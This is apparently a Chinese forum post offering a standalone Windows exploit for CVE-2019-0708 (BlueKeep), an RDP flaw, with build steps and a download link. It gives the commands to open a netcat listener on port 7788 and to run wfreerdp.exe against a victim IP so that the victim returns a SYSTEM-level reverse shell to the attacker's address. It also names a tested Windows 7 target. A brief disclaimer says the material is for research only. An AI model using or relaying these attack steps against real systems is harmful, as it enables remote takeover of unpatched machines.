作者poc仅供研究目的,如果读者利用本poc从事其他行为,与本人无关
CVE-2019-0708-EXP-WIndows版独立exe运行,无需linux,python,ruby等,运行后直接反弹System权限Shell
复现环境
被攻击者操作系统Victim:Windows 7 sp1 x64位操作系统
攻击者操作系统Attacker:Windows 10 x64位操作系统
编译环境Visual Studio 2013
使用说明
进入CVE-2019-0708-EXP-Release目录
运行nc.exe -lvp 7788
运行wfreerdp.exe /v:Victim_IP /l:Attacker_IP,如wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17
安装教程
复制FreeRDP-master项目至E:\git\KernelResearch\FreeRDP-master\
解压openssl.7z至C:\openssl\
以管理员身份安装nasm-2.14.02-installer-x64.exe
添加C:\Program Files\NASM至path环境变量
以管理员身份安装cmake-3.15.3-win64-x64.msi
添加C:\Program Files\CMake\bin至path环境变量
重启计算机
解压nasmBuildCustomizations.rar其中3个文件至C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\
client->common->freerdp-client工程目录右击->"工程依赖项"->"生成自定义",然后勾选nasm这一项
运行"C:\Program Files\CMake\bin\cmake.exe" E:\git\KernelResearch\FreeRDP-master\CMakeCache.txt
编译项目,如果发现仍然缺少文件,可以从FreeRDP-master-restore.7z还原
运行效果:
下载地址:https://gitee.com/cbwang505/CVE-2019-0708-EXP-WIndows |
发表于 2019-9-26 17:08:09
